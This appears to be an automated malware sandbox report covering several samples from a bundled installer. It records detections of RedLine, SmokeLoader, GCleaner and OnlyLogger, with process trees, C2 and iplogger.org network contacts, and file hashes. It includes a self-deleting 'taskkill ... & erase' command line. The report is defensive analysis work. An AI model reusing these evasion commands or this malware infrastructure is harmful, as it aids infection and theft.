Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09c42cad92c20f79.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09c42cad92c20f79.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09c42cad92c20f79.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09c42cad92c20f79.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09c42cad92c20f79.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 448 -ip 448

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Wed09c42cad92c20f79.exe" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 448 -s 1908

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 myloveart.top udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:80 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:80 iplogger.org tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 104.26.2.46:80 iplogger.org tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:80 api.ip.sb tcp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 freegeoip.app udp
US 104.21.73.97:80 freegeoip.app tcp
US 8.8.8.8:53 ipbase.com udp
US 172.67.209.71:80 ipbase.com tcp
US 172.67.209.71:443 ipbase.com tcp
US 8.8.8.8:53 97.73.21.104.in-addr.arpa udp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
US 104.26.13.31:80 api.ip.sb tcp
US 8.8.8.8:53 script.google.com udp
GB 216.58.201.110:80 script.google.com tcp
GB 216.58.201.110:443 script.google.com tcp
US 8.8.8.8:53 71.209.67.172.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 youtube4kdowloader.club udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp

Files

memory/448-1-0x0000000002EF0000-0x0000000002FF0000-memory.dmp

memory/448-2-0x0000000002CA0000-0x0000000002CEA000-memory.dmp

memory/448-3-0x0000000000400000-0x000000000044C000-memory.dmp

memory/448-6-0x0000000000400000-0x000000000044C000-memory.dmp

memory/448-5-0x0000000002CA0000-0x0000000002CEA000-memory.dmp

memory/448-4-0x0000000000400000-0x0000000002BC3000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win7-20240708-en

Max time kernel

141s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-31QD2.tmp\Wed09d27135e5a8b3b.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-31QD2.tmp\Wed09d27135e5a8b3b.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1244 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp
PID 1244 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp
PID 1244 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp
PID 1244 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp
PID 1244 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp
PID 1244 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp
PID 1244 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp
PID 2300 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe
PID 2300 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe
PID 2300 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe
PID 2300 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe
PID 2300 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe
PID 2300 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe
PID 2300 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe
PID 2988 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-31QD2.tmp\Wed09d27135e5a8b3b.tmp
PID 2988 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-31QD2.tmp\Wed09d27135e5a8b3b.tmp
PID 2988 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-31QD2.tmp\Wed09d27135e5a8b3b.tmp
PID 2988 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-31QD2.tmp\Wed09d27135e5a8b3b.tmp
PID 2988 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-31QD2.tmp\Wed09d27135e5a8b3b.tmp
PID 2988 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-31QD2.tmp\Wed09d27135e5a8b3b.tmp
PID 2988 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe C:\Users\Admin\AppData\Local\Temp\is-31QD2.tmp\Wed09d27135e5a8b3b.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe"

C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$4010A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-31QD2.tmp\Wed09d27135e5a8b3b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-31QD2.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$5010A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d27135e5a8b3b.exe" /SILENT

Network

Country Destination Domain Proto
US 8.8.8.8:53 ppgggb.com udp

Files

memory/1244-0-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1244-3-0x0000000000401000-0x000000000040B000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-L299H.tmp\Wed09d27135e5a8b3b.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2300-8-0x0000000000400000-0x00000000004BD000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-MF69T.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-MF69T.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/1244-28-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2988-26-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2300-25-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2988-22-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2988-44-0x0000000000400000-0x0000000000414000-memory.dmp

memory/988-45-0x0000000000400000-0x00000000004BD000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:30

Platform

win7-20241023-en

Max time kernel

121s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed096a1bff61.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed096a1bff61.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed096a1bff61.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed096a1bff61.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp

Files

memory/2156-0-0x000007FEF5D03000-0x000007FEF5D04000-memory.dmp

memory/2156-1-0x0000000001290000-0x0000000001298000-memory.dmp

memory/2156-2-0x000007FEF5D00000-0x000007FEF66EC000-memory.dmp

memory/2156-3-0x000007FEF5D03000-0x000007FEF5D04000-memory.dmp

memory/2156-4-0x000007FEF5D00000-0x000007FEF66EC000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win7-20240903-en

Max time kernel

134s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2084 set thread context of 2944 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe
PID 2084 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe
PID 2084 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe
PID 2084 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe
PID 2084 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe
PID 2084 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe
PID 2084 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe
PID 2084 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe
PID 2084 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0971f17486f8.exe

Network

Country Destination Domain Proto
FR 91.121.67.60:23325 tcp
FR 91.121.67.60:23325 tcp
FR 91.121.67.60:23325 tcp
FR 91.121.67.60:23325 tcp
FR 91.121.67.60:23325 tcp
FR 91.121.67.60:23325 tcp

Files

memory/2084-0-0x00000000742DE000-0x00000000742DF000-memory.dmp

memory/2084-1-0x0000000000C10000-0x0000000000C78000-memory.dmp

memory/2084-2-0x00000000742D0000-0x00000000749BE000-memory.dmp

memory/2944-3-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2944-6-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2944-5-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2944-4-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2944-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2944-9-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2944-15-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2944-14-0x00000000742D0000-0x00000000749BE000-memory.dmp

memory/2944-11-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2084-16-0x00000000742D0000-0x00000000749BE000-memory.dmp

memory/2944-17-0x00000000742D0000-0x00000000749BE000-memory.dmp

memory/2944-18-0x00000000742D0000-0x00000000749BE000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:30

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b3a5ca1a712d390.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b3a5ca1a712d390.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b3a5ca1a712d390.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b3a5ca1a712d390.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b3a5ca1a712d390.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/1892-0-0x00000000751DE000-0x00000000751DF000-memory.dmp

memory/1892-1-0x0000000000340000-0x0000000000358000-memory.dmp

memory/1892-2-0x0000000004C00000-0x0000000004C06000-memory.dmp

memory/1892-3-0x00000000751D0000-0x0000000075980000-memory.dmp

memory/1892-4-0x00000000751D0000-0x0000000075980000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b2a8bc4f16cb.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b2a8bc4f16cb.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b2a8bc4f16cb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b2a8bc4f16cb.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b2a8bc4f16cb.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b2a8bc4f16cb.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09b2a8bc4f16cb.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1948 -ip 1948

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 352

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/1948-1-0x0000000002D30000-0x0000000002E30000-memory.dmp

memory/1948-3-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1948-2-0x00000000001C0000-0x00000000001C9000-memory.dmp

memory/1948-5-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1948-4-0x0000000000400000-0x0000000002BAA000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09cfb2f9758281d8.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09cfb2f9758281d8.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09cfb2f9758281d8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09cfb2f9758281d8.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09cfb2f9758281d8.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 980 -ip 980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 980 -s 692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 980 -ip 980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 980 -s 788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 980 -ip 980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 980 -s 944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 980 -ip 980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 980 -s 976

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 980 -ip 980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 980 -s 996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 980 -ip 980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 980 -s 992

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09cfb2f9758281d8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09cfb2f9758281d8.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 980 -ip 980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 980 -s 748

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Wed09cfb2f9758281d8.exe" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp

Files

memory/980-1-0x0000000000780000-0x0000000000880000-memory.dmp

memory/980-2-0x0000000000590000-0x00000000005DC000-memory.dmp

memory/980-3-0x0000000000400000-0x0000000000450000-memory.dmp

memory/980-5-0x0000000000590000-0x00000000005DC000-memory.dmp

memory/980-6-0x0000000000400000-0x0000000000450000-memory.dmp

memory/980-4-0x0000000000400000-0x000000000058E000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win7-20240903-en

Max time kernel

119s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\libcurl.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\libcurl.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\libcurl.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 248

Network

N/A

Files

memory/1048-1-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1048-0-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1048-3-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1048-2-0x0000000064941000-0x000000006494F000-memory.dmp

memory/1048-6-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1048-4-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1048-5-0x000000006B440000-0x000000006B4CF000-memory.dmp

